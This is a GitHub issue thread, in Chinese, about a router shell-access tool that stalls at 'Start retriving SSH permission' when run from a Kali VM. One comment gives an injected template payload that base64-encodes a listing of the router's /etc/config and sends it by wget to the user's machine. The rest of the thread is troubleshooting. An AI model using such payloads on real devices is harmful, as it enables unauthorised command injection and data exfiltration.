### ISSUE TITLE
windows使用虚拟机安装kali Linux系统，执行卡在Start retriving SSH permission.就不动了

### ISSUE THREAD

**Issue by thisThink** [z-jack/BE5000_GetShell#4]
在这个函数增加打印信息也不打印，就是连不上，但用虚拟机curl 192.168.31.1可以访问路由器；
![image](https://github.com/user-attachments/assets/b6c07e41-5758-47a7-96b5-0e272dfef3e0)

**Comment by moyuwuhen601** [comment]
把ping1.template的内容全部删除，填写
a=$(ls -l /etc/config | base64 -w 0)
wget "http://{{LOCAL_IP}}:{{PORT}}/$a"
再运行看看有没有输出，看看三个基本信息填对没有，把你的系统防火墙关闭试试。

**Comment by thisThink** [comment]
> 把ping1.template的内容全部删除，填写 a=$(ls -l /etc/config | base64 -w 0) wget "http://{{LOCAL_IP}}:{{PORT}}/$a" 再运行看看有没有输出，看看三个基本信息填对没有，把你的系统防火墙关闭试试。

防火墙关闭了，ping1.template也替换你发的，还是没有输出，打印Start retriving SSH permission.就不跑了。TOKEN会变，我都是拿最新的；LOCAL_IP填写的虚拟机ip，4个参数没问题啊
![image](https://github.com/user-attachments/assets/af9509ab-feb9-4e03-a04b-22725ba1de1b)

![image](https://github.com/user-attachments/assets/4356c46b-39b4-4427-aecf-b0bb049fe1f8)

**Comment by moyuwuhen601** [comment]
> 在这个函数增加打印信息也不打印，就是连不上，但用虚拟机curl 192.168.31.1可以访问路由器；
> 
> ![image](https://github.com/user-attachments/assets/b6c07e41-5758-47a7-96b5-0e272dfef3e0)
> 
> 

你本机什么系统的，我用的Windows可以正常运行

**Comment by thisThink** [comment]
> > 在这个函数增加打印信息也不打印，就是连不上，但用虚拟机curl 192.168.31.1可以访问路由器；
> > ![image](https://private-user-images.githubusercontent.com/106603221/393506170-b6c07e41-5758-47a7-96b5-0e272dfef3e0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzM1ODA4MTcsIm5iZiI6MTczMzU4MDUxNywicGF0aCI6Ii8xMDY2MDMyMjEvMzkzNTA2MTcwLWI2YzA3ZTQxLTU3NTgtNDdhNy05NmI1LTBlMjcyZGZlZjNlMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjA3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIwN1QxNDA4MzdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02ZDllNGE1ZWU4YzE4MTFkMDc3NWU0ZjcwZTFhM2IwNjE2MTNiY2Y2NTgyZDRhYThhZmU0Y2RkZDdkNmIwZjI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.FUFKik2oIJmJNqx7aF67b-B6luM_tbmzFBEBqqahAjo)
> 
> 你本机什么系统的，我用的Windows可以正常运行

win10,使用vmware安装kali系统，我看了你issues，你只是修改了ping1.template就正常了吗

**Comment by moyuwuhen601** [comment]
> > > 在这个函数增加打印信息也不打印，就是连不上，但用虚拟机curl 192.168.31.1可以访问路由器；
> 
> > > ![image](https://private-user-images.githubusercontent.com/106603221/393506170-b6c07e41-5758-47a7-96b5-0e272dfef3e0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzM1ODA4MTcsIm5iZiI6MTczMzU4MDUxNywicGF0aCI6Ii8xMDY2MDMyMjEvMzkzNTA2MTcwLWI2YzA3ZTQxLTU3NTgtNDdhNy05NmI1LTBlMjcyZGZlZjNlMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjA3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIwN1QxNDA4MzdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02ZDllNGE1ZWU4YzE4MTFkMDc3NWU0ZjcwZTFhM2IwNjE2MTNiY2Y2NTgyZDRhYThhZmU0Y2RkZDdkNmIwZjI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.FUFKik2oIJmJNqx7aF67b-B6luM_tbmzFBEBqqahAjo)
> 
> > 
> 
> > 你本机什么系统的，我用的Windows可以正常运行
> 
> 
> 
> win10,使用vmware安装kali系统，我看了你issues，你只是修改了ping1.template就正常了吗

没错，今天早上刚成功的，当然我的Python版本也是3.8.20

**Comment by z-jack** [comment]
我更新了一个版本去额外处理编码问题，可以确认一下最新版本是否能够解决
